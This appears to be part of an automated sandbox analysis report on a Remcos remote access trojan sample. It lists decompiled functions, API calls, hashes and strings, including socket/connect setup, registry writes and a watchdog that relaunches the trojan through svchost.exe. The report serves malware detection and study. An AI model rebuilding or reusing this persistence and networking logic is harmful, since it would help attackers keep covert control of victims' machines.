                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction ID: e9b8f34285146556d923ff1311e539e3090c3a2a7499f994c32c4d3a3a900868
                                        • Opcode Fuzzy Hash: 55f81898a082b856529423ab666f51d9d292b3708a6e04e50ac108d0079eece6
                                        • Instruction Fuzzy Hash: A8F0F976900218FFDF118FA0EC06FDA7FA8EB48764F148165FA05EA150E7719A10AB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B8F8, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@$?c_str@?$basic_string@V01@@$?size@?$basic_string@CloseCreateD@1@@Value
                                        • String ID:
                                        • API String ID: 4160275866-0
                                        • Opcode ID: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                        • Instruction ID: a30d44c29fbcbd94969b178d1547bfdf4262e3352807cc03f3af364f17bb576d
                                        • Opcode Fuzzy Hash: 94e2c8fb91e0ed3f8a2486e32967f0b369ab0fbd2e3e4c85fbc94b61518e1a91
                                        • Instruction Fuzzy Hash: C9F04F7280010EABCF01AFA5DC458EE7B79BB04208F004829F92522060E67695A4DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413E46, Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: __dllonexit_onexit
                                        • String ID:
                                        • API String ID: 2384194067-0
                                        • Opcode ID: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction ID: 4ade6cbf426c929272142e716342c2a11d1dea90e179e11a85702f2ae3751f82
                                        • Opcode Fuzzy Hash: a0f76b705919cd2b1b3505feded0ad4b759bc61fe2e2080deee93d3e34803ae7
                                        • Instruction Fuzzy Hash: 55C01274CC4301FBCF102B60BC866C67711B7A1B32BA087AAF565110F0C77D49A4AA0D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402038, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 80%
                                        			E00402038(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr* _t9;

				_t9 = __ecx;
				if( *0x41b730 != 0) {
					L2:
					_push(6);
					_push(1);
					_push(0); // executed
					L0041418E(); // executed
					 *_t9 = _t6;
					if(_t6 != 0xffffffff) {
						 *(_t9 + 0x38) =  *(_t9 + 0x38) & 0x00000000;
						 *(_t9 + 0x39) =  *(_t9 + 0x39) & 0x00000000;
						 *((intOrPtr*)(_t9 + 0x34)) = 0x3e8;
						return _t6;
					} else {
						goto L3;
					}
				} else {
					_t6 = E00402074(); // executed
					if(_t6 == 0) {
						L3:
						return 0;
					} else {
						goto L2;
					}
				}
			}





                                        0x00402040
                                        0x00402042
                                        0x0040204d
                                        0x0040204d
                                        0x0040204f
                                        0x00402051
                                        0x00402053
                                        0x0040205b
                                        0x0040205d
                                        0x00402063
                                        0x00402067
                                        0x0040206b
                                        0x00402073
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00402044
                                        0x00402044
                                        0x0040204b
                                        0x0040205f
                                        0x00402062
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040204b

                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 00402074: WSAStartup.WS2_32(00000202,?), ref: 00402089
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Startupsocket
                                        • String ID:
                                        • API String ID: 3996037109-0
                                        • Opcode ID: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                        • Instruction ID: 9496cea1f1e3f543e84bf9b8819d2566c755aa2e8cb9b0b358b440cdad1f8944
                                        • Opcode Fuzzy Hash: a838745da6ed8195359329033db1b7584455c5d17c7e212a85de7325608f8976
                                        • Instruction Fuzzy Hash: 0FE026204487A121EFB02B20678D3C32BC11B02738F0016AEF280769D3C3FC1485C388
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040209B, Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0040209B(intOrPtr* __ecx, void* _a4) {
				signed int _t3;

				_t1 = __ecx + 4; // 0x41be74
				_t3 = _t1;
				_push(0x10);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(_t3);
				_push( *__ecx);
				asm("movsd"); // executed
				L0041419A(); // executed
				asm("sbb al, al");
				return  ~_t3 + 1;
			}




                                        0x0040209f
                                        0x0040209f
                                        0x004020a8
                                        0x004020aa
                                        0x004020ab
                                        0x004020ac
                                        0x004020ad
                                        0x004020ae
                                        0x004020b0
                                        0x004020b1
                                        0x004020b8
                                        0x004020bf

                                        APIs
                                        • connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: connect
                                        • String ID:
                                        • API String ID: 1959786783-0
                                        • Opcode ID: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                        • Instruction ID: 87562d7c3fa6cfb31469a52a797acd734afc423ba1c102534055d0d979432199
                                        • Opcode Fuzzy Hash: 8f987cbbf3fb9e12a8f92e976e4f78da9b9bf78db8d1cc63ee0fa56af0114424
                                        • Instruction Fuzzy Hash: 15D0A73308052C7AC900DDA4EC02DF7375DDB83B60F104416FE018F052C293A59691D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402074, Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E00402074() {
				char _v404;
				signed int _t2;
				char _t4;

				_t2 =  &_v404;
				_push(_t2);
				_push(0x202); // executed
				L00414194(); // executed
				asm("sbb al, al");
				_t4 =  ~_t2 + 1;
				 *0x41b730 = _t4;
				return _t4;
			}






                                        0x0040207d
                                        0x00402083
                                        0x00402084
                                        0x00402089
                                        0x00402090
                                        0x00402092
                                        0x00402094
                                        0x0040209a

                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 00402089
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                        • Instruction ID: aaec609cd6a5438bb82df53de8e824b0c91ee93dfa3372403453e0fac8186511
                                        • Opcode Fuzzy Hash: 85389655ccf312e74c41d41a43fd4d1fbb1ccf973644e7ce17a1e4acb925192c
                                        • Instruction Fuzzy Hash: 4AC08C3149431C6DEA02A3B5990BBE5776CD35EB44F4002BAAA11830D7D384955D42B6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0040A5F5, Relevance: 87.7, APIs: 40, Strings: 10, Instructions: 222sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcessId.KERNEL32 ref: 0040A5FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,00000000), ref: 0040A611
                                          • Part of subcall function 0040B829: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B836
                                          • Part of subcall function 0040B829: RegSetValueExA.ADVAPI32(?,00000004,00000000,00000004,?,00000004,00000000,?,00409CDD,80000001,00000000), ref: 0040B851
                                          • Part of subcall function 0040B829: RegCloseKey.ADVAPI32(?,?,00409CDD,80000001,00000000), ref: 0040B85C
                                        • OpenMutexA.KERNEL32 ref: 0040A63B
                                        • CloseHandle.KERNEL32(00000000), ref: 0040A64A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Remcos restarted by watchdog!,?), ref: 0040A65E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A68C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A69C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,?), ref: 0040A6B6
                                          • Part of subcall function 0040B4C8: RegOpenKeyExA.KERNELBASE(80000001,00408EBE,00000000,00020019,00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E), ref: 0040B4E7
                                          • Part of subcall function 0040B4C8: RegQueryValueExA.KERNELBASE(00408EBE,?,00000000,80000001,?,00000000,0041BCB0,?,?,?,00408EBE,80000001,00000000), ref: 0040B505
                                          • Part of subcall function 0040B4C8: RegCloseKey.KERNELBASE(00408EBE,?,?,?,00408EBE,80000001,00000000,?,?,?,?,0000000E,00415774), ref: 0040B510
                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 0040A6D4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH), ref: 0040A6E2
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                          • Part of subcall function 0040B95B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                          • Part of subcall function 0040B95B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                          • Part of subcall function 0040B95B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                          • Part of subcall function 0040B95B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                          • Part of subcall function 0040A8CE: OpenProcess.KERNEL32(00100000,00000000,?,80000001,?,0040A86F), ref: 0040A8DC
                                          • Part of subcall function 0040A8CE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,0040A86F), ref: 0040A8E7
                                          • Part of subcall function 0040A8CE: CloseHandle.KERNEL32(00000000,?,0040A86F), ref: 0040A8EE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?), ref: 0040A7A3
                                        • _wgetenv.MSVCRT ref: 0040A7B3
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A7BE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A7C9
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A7D5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7DE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7E7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog launch failed!,?), ref: 0040A882
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?), ref: 0040A896
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A673
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A709
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040A718
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 0040A72D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?), ref: 0040A748
                                        • _wgetenv.MSVCRT ref: 0040A758
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040A763
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040A76E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040A77A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A783
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A78C
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A7F0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(\svchost.exe), ref: 0040A7FE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041BD70), ref: 0040A80C
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040A816
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Watchdog module activated,?), ref: 0040A837
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040A84B
                                        • Sleep.KERNEL32(000007D0), ref: 0040A85E
                                        • CloseHandle.KERNEL32 ref: 0040A8AA
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8B6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040A8BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@$Hstd@@V?$basic_string@$CloseG@1@@$D@2@@0@Open$HandleProcessV01@V10@0@$??4?$basic_string@G@2@@0@V01@@V10@Value_wgetenv$CreateCurrentLocalMutexObjectQuerySingleSleepTimeV10@@WaitY?$basic_string@printf
                                        • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[INFO]$\SysWOW64$\svchost.exe$\system32
                                        • API String ID: 2208868093-2207663338
                                        • Opcode ID: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                        • Instruction ID: 260755ff1fe0d3a0fcb30184a4449815193b010e4943e9dd02dd017fae915b1e
                                        • Opcode Fuzzy Hash: 9febc14696e297f8041a309c44c85142312e4adffe610cb7ea525cefc84dafa8
                                        • Instruction Fuzzy Hash: 82714272910509EFDB04BBE0EC4A9EE7B3CEF54345F404036F912A2191EB795985CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00410586, Relevance: 78.3, APIs: 52, Instructions: 279fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00410595
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 004105AD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 004105BE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004105CD
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,00000000,00000001), ref: 00410617
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00000000,00000001), ref: 00410624
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041062F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000001), ref: 0041063B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410648
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,00000000,00000001), ref: 00410655
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,00000000,00000001), ref: 00410679
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000,00000001), ref: 0041068B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 00410694
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106A9
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,00000000,00000001), ref: 004106B3
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,?,?,?,00000000,00000001), ref: 004106D0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000,00000001), ref: 004106DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,Function_0001B310,00000000,00000000,Function_0001B310,00000000,00000002,Function_0001B310,?), ref: 00410713
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,Function_0001B310,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00410720
